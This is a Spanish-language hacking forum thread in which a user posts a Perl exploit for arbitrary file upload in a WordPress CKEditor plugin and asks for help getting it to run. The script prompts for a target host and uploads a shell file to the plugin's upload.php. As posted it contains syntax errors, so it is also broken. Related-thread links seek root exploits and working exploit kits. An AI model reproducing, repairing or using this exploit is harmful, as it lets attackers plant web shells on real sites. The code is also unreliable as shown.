comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Wordpress plugin File Upload Exploit

  • 2 Respuestas
  • 2385 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado DLV

  • *
  • Underc0der
  • Mensajes: 117
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
  • Skype: dlv.team
« en: Febrero 07, 2013, 07:41:25 pm »
Este exploit esta en perl pero cuando lo ejecuto desde el backtrack no me funciona osea me tira error en unas linas
Exploit :http://1337day.com/exploit/20318

Codigo:
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
#!/usr/bin/perl
 
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;
 
print <<INTRO;
- Wordpress plugin CKEditor 4.0 Arbitrary File Upload Exploit
- Vuln found and exploit written by sk0d SOH-Crew
- Contact: sk0d@web.de
- Greetings: bd0rk, RaSsGoR, x0r_32
INTRO
print "Targethost: ";
chomp (my $tar=<STDIN>);
print "Directory: ";
chomp (my $shell=<STDIN>);
 
my $a = LWP::UserAgent->new;
my $b = $a->request(POST $tar.'/wp-content/plugins/ckeditor-for-wordpress/includes/upload.php';
Content_Type => 'form-data',
Content => [ NewFile => $shell ] );
 
if ($b->is_success) {
if (index($b->content, "Disabled") != -1) { print "The webserver is manipulated with your shellcode.\n"; } else { print "Exploit failed! :(\n";
} else { print "Not connected with Target!\n"; }
 
exit;

No se como hacerlo funcionar ayuda porfavor ? :)
« Última modificación: Noviembre 23, 2014, 01:36:26 pm por Expermicid »

Desconectado Razita001

  • *
  • Underc0der
  • Mensajes: 4
  • Actividad:
    0%
  • Reputación 0
  • el mundo nos pertenece
    • Ver Perfil
    • Email
« Respuesta #1 en: Febrero 08, 2013, 03:29:31 am »
AHaber ademas de las lineas 14 y 16 que otras lineas te dan error? Para ver que mas le pillamos ;)

saludos

Desconectado DLV

  • *
  • Underc0der
  • Mensajes: 117
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
  • Skype: dlv.team
« Respuesta #2 en: Febrero 08, 2013, 03:37:12 am »
21 y 24 27 creo esas son :/

 

¿Te gustó el post? COMPARTILO!



Ayuda este exploit me sirve para elevar privilegios y tener permisos en ssh?

Iniciado por xavicibi

Respuestas: 8
Vistas: 2462
Último mensaje Noviembre 06, 2014, 03:48:27 pm
por Snifer
¿alguna manera efectiva de encontrar jmp o call en exploit para linux?

Iniciado por proxy_lainux

Respuestas: 0
Vistas: 281
Último mensaje Marzo 31, 2018, 11:32:40 pm
por proxy_lainux
[SOLUCIONADO] Error al runear exploit nuevo agregado manualmente METASPLOIT.

Iniciado por snyperip

Respuestas: 1
Vistas: 1098
Último mensaje Agosto 03, 2013, 01:13:08 am
por Stuxnet
Algún exploit kit funcional aunque este detectado por los antivirus?

Iniciado por xavicibi

Respuestas: 0
Vistas: 936
Último mensaje Febrero 19, 2015, 12:00:35 pm
por xavicibi
Necesito exploit root para Linux 2.6.32-320.4.1.lve1.1.4.el6.x86_64

Iniciado por Mr_Pack

Respuestas: 0
Vistas: 1558
Último mensaje Julio 21, 2012, 03:29:25 pm
por Mr_Pack